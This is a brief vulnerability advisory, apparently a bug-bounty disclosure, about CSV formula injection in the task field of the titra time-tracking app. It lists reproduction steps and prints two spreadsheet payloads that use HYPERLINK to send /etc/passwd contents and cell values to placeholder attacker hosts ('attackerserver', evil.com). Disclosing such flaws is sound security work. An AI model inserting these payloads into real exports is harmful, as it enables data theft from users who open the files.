Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in kromitgmbh/titra
Jun 3rd 2022
Formula Injection/CSV Injection in "Task" due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
- Click on plus track button
- Under the task input field enter the payloads
- Now enter the work hour as
- Then click on save
- Now go to details and click on CSV and the csv will be downloaded.
Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data. On constructing the payloads as
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); =HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
An attacker can have access to /etc/passwd system file